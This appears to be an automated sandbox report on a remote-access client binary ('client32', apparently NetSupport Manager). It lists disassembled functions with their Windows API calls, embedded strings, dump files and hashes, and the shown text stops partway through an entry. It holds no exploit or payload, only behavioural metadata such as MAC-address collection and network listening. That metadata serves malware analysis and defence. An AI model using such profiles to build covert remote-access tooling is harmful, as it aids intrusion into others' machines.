                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                                • API String ID: 2238969640-1197860701
                                                                                                • Opcode ID: b11938eb605dc031869e087fc9c7add31060dff85b9aba7f1ec38fee18804eb7
                                                                                                • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                                • Opcode Fuzzy Hash: b11938eb605dc031869e087fc9c7add31060dff85b9aba7f1ec38fee18804eb7
                                                                                                • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                                Function 69CF7F80 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF7F9F
                                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 69CF7FAC
                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo,?,?,00000000,?,?,?,?,?,?,?,?,69CEB916,?,00000100), ref: 69CF7FCB
                                                                                                • _malloc.LIBCMT ref: 69CF7FFB
                                                                                                • wsprintfA.USER32 ref: 69CF807C
                                                                                                • _free.LIBCMT ref: 69CF8110
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 69CF811C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
                                                                                                • String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
                                                                                                • API String ID: 1404005415-834977148
                                                                                                • Opcode ID: 18c8ee76371a2c09afa9e26240cf84a707ef0264d400fcc30ce23656d5f20fc5
                                                                                                • Instruction ID: 161fe4ae889007dd55464b2624de6351c513388683a7da43e46649ac065830b6
                                                                                                • Opcode Fuzzy Hash: 18c8ee76371a2c09afa9e26240cf84a707ef0264d400fcc30ce23656d5f20fc5
                                                                                                • Instruction Fuzzy Hash: 5D511571A042499BDF01CFB9D9A1EEE7BF9AF09304F448175EE46AB241E7319806C760
                                                                                                Function 69D001E0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69D0024A
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69D0025F
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 69D00276
                                                                                                • InitializeCriticalSection.KERNEL32(-0000000E), ref: 69D00289
                                                                                                • InitializeCriticalSection.KERNEL32(69D2D004), ref: 69D00298
                                                                                                • EnterCriticalSection.KERNEL32(69D2D004), ref: 69D002AC
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69D002D2
                                                                                                • LeaveCriticalSection.KERNEL32(69D2D004), ref: 69D0035F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: QueueThreadEvent$Refcount.cpp
                                                                                                • API String ID: 1976012330-644804141
                                                                                                • Opcode ID: 9ff2ca97c6ec93fd325127d711aeca70cb0da9504843c0944c7cd91bdfd80524
                                                                                                • Instruction ID: 5799e5daff2cff49376ed8459351c69c9d6d7e5f14a263169322d37045d81a0e
                                                                                                • Opcode Fuzzy Hash: 9ff2ca97c6ec93fd325127d711aeca70cb0da9504843c0944c7cd91bdfd80524
                                                                                                • Instruction Fuzzy Hash: BE41B0B1904644AFEB11CFB8C954B6EBBE4EF56744F10813AEA09D7A80E7709904CB51
                                                                                                Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                                • _memset.LIBCMT ref: 1101F2D8
                                                                                                • GetMenuItemInfoA.USER32 ref: 1101F2F6
                                                                                                • _free.LIBCMT ref: 1101F305
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • _free.LIBCMT ref: 1101F30E
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                                • String ID: $0$UndoOwnerDraw
                                                                                                • API String ID: 4094458939-790594647
                                                                                                • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                                • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                                Function 1106F400 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 1106F737
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                                • API String ID: 3005300677-3496508882
                                                                                                • Opcode ID: 6ba06e8ed43bf74c6aa00610e1ff475108c024fe5207e0ae52762ffacf5df690
                                                                                                • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                                                • Opcode Fuzzy Hash: 6ba06e8ed43bf74c6aa00610e1ff475108c024fe5207e0ae52762ffacf5df690
                                                                                                • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                                                Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 1104147B
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,000103BC,?,00000002,00002710,?), ref: 11041670
                                                                                                • _free.LIBCMT ref: 11041677
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                                • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                • API String ID: 1897251511-2352888828
                                                                                                • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                                • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                                • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                                • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                                Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110513F9
                                                                                                • CloseHandle.KERNEL32(?), ref: 110514DB
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle__wcstoi64_memset
                                                                                                • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                                • API String ID: 510078033-311296318
                                                                                                • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                                • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                                Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 1102965A
                                                                                                • GetTickCount.KERNEL32 ref: 1102968A
                                                                                                • GetTickCount.KERNEL32(Client,DisableStandby,00000000,00000000,0212C370,000000D0,986DAFD2), ref: 110296C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick
                                                                                                • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                                • API String ID: 536389180-1339850372
                                                                                                • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                                • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                                • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                                • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                                Function 69CF7810 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 125networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 69CF783E
                                                                                                • #16.WSOCK32(?,?,?,00000000), ref: 69CF78F6
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 69CF7924
                                                                                                • wsprintfA.USER32 ref: 69CF7937
                                                                                                • OutputDebugStringA.KERNEL32(?), ref: 69CF7944
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DebugErrorLastOutputString_memmovewsprintf
                                                                                                • String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
                                                                                                • API String ID: 2214935655-769711038
                                                                                                • Opcode ID: 34e57bec948bc238068c1b5d94c9136f316a3913ca854169e911ed54193007dd
                                                                                                • Instruction ID: f73e9b948e80e9f430e61f950c75207fbd501aca909613d53e5ad1cc6334ea13
                                                                                                • Opcode Fuzzy Hash: 34e57bec948bc238068c1b5d94c9136f316a3913ca854169e911ed54193007dd
                                                                                                • Instruction Fuzzy Hash: D8416D79A006049FE714DF64ED55E6AB7E4EF48318B00C83DE99A87A41F731F906DB90
                                                                                                Function 69CE6A40 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 69CE6ABD
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 69CE6ACF
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 69CE6AFC
                                                                                                • wsprintfA.USER32 ref: 69CE6B52
                                                                                                • _free.LIBCMT ref: 69CE6B96
                                                                                                • _free.LIBCMT ref: 69CE6BA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library_free$AddressFreeLoadProcwsprintf
                                                                                                • String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
                                                                                                • API String ID: 3641295650-227718810
                                                                                                • Opcode ID: b0078eebc47c8c7e47a3d60e555ac03180d0aad6749947fbcb1996d06f427f67
                                                                                                • Instruction ID: 0046ba6a34e62be9265c53f642cfc3deafd3d2b3f5c1610a63ee1147968d218d
                                                                                                • Opcode Fuzzy Hash: b0078eebc47c8c7e47a3d60e555ac03180d0aad6749947fbcb1996d06f427f67
                                                                                                • Instruction Fuzzy Hash: 9A413175D005199BDB25CF64DD85FEEB7B8AF48304F0081E9EA0DA7640EB709E849FA0
                                                                                                Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindWindowA.USER32 ref: 1103D2E4
                                                                                                • SendMessageA.USER32(00000000,0000004A,000103BC,?), ref: 1103D313
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                                • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                                • String ID: CLTCONN.CPP$NSMW16Class
                                                                                                • API String ID: 4104200039-3790257117
                                                                                                • Opcode ID: 4a7d6abcdd368d216a64646516aa5f6dee3f13f39ed5830a76ce57b1047c955b
